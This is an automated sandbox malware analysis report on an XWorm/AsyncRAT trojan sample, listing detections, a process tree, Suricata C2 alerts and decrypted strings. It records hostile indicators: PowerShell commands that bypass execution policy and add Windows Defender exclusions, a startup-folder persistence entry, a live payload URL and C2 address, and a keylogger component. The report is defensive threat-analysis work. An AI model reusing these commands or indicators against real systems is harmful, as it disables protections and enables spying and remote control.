
Windows Analysis Report
1c8DbXc5r0.exe

Overview

General Information

Sample name: 1c8DbXc5r0.exe (renamed because the original name is a hash value)
Original sample name: 49aa60a3ee7d3b03d16aa591024cbbc7.exe
Analysis ID: 1527586
MD5: 49aa60a3ee7d3b03d16aa591024cbbc7
SHA1: ab7a4b389a7583370a53792852a819aa34d5d2e8
SHA256: e9f7edcb41000f0375515a01dae7d155723b8bbba28c7bae75c63e7d98fdedaa
Tags: 32exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • 1c8DbXc5r0.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\1c8DbXc5r0.exe" MD5: 49AA60A3EE7D3B03D16AA591024CBBC7)
    • powershell.exe (PID: 6656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
1c8DbXc5r0.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
1c8DbXc5r0.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8026:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\rapent.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\rapent.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8026:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8178:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8215:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x832a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7e26:$cnc4: POST / HTTP/1.1
Process Memory Space: 1c8DbXc5r0.exe PID: 6444 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
0.0.1c8DbXc5r0.exe.8d0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.1c8DbXc5r0.exe.8d0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8026:$cnc4: POST / HTTP/1.1

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\1c8DbXc5r0.exe, ProcessId: 6444, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnk
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T04:51:08.553146+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:09.270583+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:21.674385+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:34.080889+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:38.569939+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:47.469232+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:58.893126+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:52:08.174794+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:52:08.576283+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T04:51:09.272872+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP
2024-10-07T04:51:21.676737+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP
2024-10-07T04:51:34.085484+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP
2024-10-07T04:51:47.470728+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP
2024-10-07T04:51:58.895796+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP
2024-10-07T04:52:08.175608+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T04:51:08.553146+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:51:38.569939+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP
2024-10-07T04:52:08.576283+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.18 | 55624 | 192.168.2.4 | 49738 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T04:51:08.980911+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.18 | 55624 | TCP


              AV Detection

Source: 1c8DbXc5r0.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\rapent.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\rapent.exe; ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\rapent.exe; Virustotal: Detection: 76%
Source: 1c8DbXc5r0.exe; ReversingLabs: Detection: 89%
Source: 1c8DbXc5r0.exe; Virustotal: Detection: 77%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\rapent.exe; Joe Sandbox ML: detected
Source: 1c8DbXc5r0.exe; Joe Sandbox ML: detected
Source: 1c8DbXc5r0.exe; String decryptor: https://ser0xen.com/pl.txt
Source: 1c8DbXc5r0.exe; String decryptor: <123456789>
Source: 1c8DbXc5r0.exe; String decryptor: <Xwormmm>
Source: 1c8DbXc5r0.exe; String decryptor: XWorm V5.6
Source: 1c8DbXc5r0.exe; String decryptor: USB.exe
Source: 1c8DbXc5r0.exe; String decryptor: %AppData%
Source: 1c8DbXc5r0.exe; String decryptor: rapent.exe
Source: 1c8DbXc5r0.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 18.224.107.108:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: 1c8DbXc5r0.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

Source: Network traffic; Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.18:55624 -> 192.168.2.4:49738
Source: Network traffic; Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.18:55624 -> 192.168.2.4:49738
Source: Network traffic; Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.18:55624
Source: Network traffic; Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49738 -> 147.185.221.18:55624
Source: global traffic; TCP traffic: 192.168.2.4:49738 -> 147.185.221.18:55624
Source: global traffic; HTTP traffic detected: GET /pl.txt HTTP/1.1 Host: ser0xen.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 147.185.221.18
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: SALSGIVERUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: ser0xen.com
Source: global traffic; DNS traffic detected: DNS query: models-subscriptions.gl.at.ply.gg
Source: powershell.exe, 00000001.00000002.1758314462.0000024B31650000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000007.00000002.1982591730.000001355AF9A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1843415748.0000013EDD09E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ser0xen.com
Source: 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ser0xen.com/pl.txt
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown; HTTPS traffic detected: 18.224.107.108:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1c8DbXc5r0.exe, XLogger.cs; .Net Code: KeyboardLayout
Source: rapent.exe.0.dr, XLogger.cs; .Net Code: KeyboardLayout

              Operating System Destruction

Source: C:\Users\user\Desktop\1c8DbXc5r0.exe; Process information set: 01 00 00 00

              System Summary

              barindex
              Source: 1c8DbXc5r0.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B888E520_2_00007FFD9B888E52
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8805B80_2_00007FFD9B8805B8
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8880A60_2_00007FFD9B8880A6
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B883F280_2_00007FFD9B883F28
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9630E94_2_00007FFD9B9630E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9530E911_2_00007FFD9B9530E9
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\rapent.exe E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
              Source: 1c8DbXc5r0.exe, 00000000.00000000.1666003464.00000000008DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecretiutfghtreg.exe4 vs 1c8DbXc5r0.exe
              Source: 1c8DbXc5r0.exeBinary or memory string: OriginalFilenamecretiutfghtreg.exe4 vs 1c8DbXc5r0.exe
              Source: 1c8DbXc5r0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1c8DbXc5r0.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 1c8DbXc5r0.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1c8DbXc5r0.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1c8DbXc5r0.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: rapent.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: rapent.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: rapent.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1c8DbXc5r0.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 1c8DbXc5r0.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: rapent.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: rapent.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/20@2/2
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Roaming\rapent.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeMutant created: \Sessions\1\BaseNamedObjects\qrHUH9z9nk81LG5x
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
              Source: 1c8DbXc5r0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 1c8DbXc5r0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 1c8DbXc5r0.exeReversingLabs: Detection: 89%
              Source: 1c8DbXc5r0.exeVirustotal: Detection: 77%
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile read: C:\Users\user\Desktop\1c8DbXc5r0.exeJump to behavior
